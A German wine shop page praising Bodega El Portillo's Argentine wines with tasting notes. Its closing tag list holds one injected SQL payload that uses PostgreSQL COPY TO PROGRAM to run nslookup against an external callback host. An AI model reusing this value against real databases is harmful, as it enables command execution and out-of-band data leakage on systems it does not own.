Bodega El Portillo ~ feine Weine aus Argentinien

Die Bodega El Portillo liegt etwa 1 km entfernt von der Bodega Saletein, im Valle de Uco 100km ördlich von der Stadt Mendoza. Die Kellerei wurde neu erbaut und der Jahrgang 2005 war der Erste, der komplett in den neuen Anlagen vinifiziert wurde. Ebenfalls neu ist der Winemaker von El Portillo, Mauricio Fogliati. Sein Ziel ist es, die überragenden Bedingungen, die sowohl in den Weinbergen als auch von den technischen Vorraussetzungen der Kellerei her herrschen, optimal zu nutzen. Dabei liegt die höchste Priorität darin, ein Maximum an natürlichen Fruchtaromen in seinen Weinen zu erhalten.

Beim Verkosten der aktuellen Kollektion kann man ihm nur gratulieren, denn die Weine bieten fantastische Qualitäten zu sehr kleinen Preisen. Die Ausstattung der Bi-Varietel-Linie von El Portillo wird gerade überarbeitet und trägt zukünftig den Namen ‚Paso‘. Unverändert bleibt der Inhalt mit einer frischen Cuvée aus Sauvignon Blanc und Chardonay, Schmelz und aromatische Frische sind wunderbar vermählt. Ausserdem Tempranillo mit Malbec, der leichtere Tempranillo bringt Eleganz und der Malbec die Fülle. Der Syrah El Portillo wurde ebenefalls ohne Holz ausgebaut ist dennoch sehr voluminös und samtig.

Klassisch bereits der El Portillo Malbec, nur ein klein wenig Holz mit viel viel Frucht und samtiger Süsse am Gaumen. Neu im Sortiment ist der Elevado Malbec. Etwa die Hälfte des Weins wird für 6-8 Monate im Barrique ausgebaut. Beeindruckend die schwarze Farbe uns sein weiches Tannin. Ebenfalls neu ist der El Portillo Sparkling Brut, ein Schaumwein vinifiziert aus Chardonnay und Pinot Noir. Elegant mit floralen Noten und Aprikose.

  • testing
  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-10933.73502.38e4e.1.bxss.me
  • saletein paso sauvingion blanc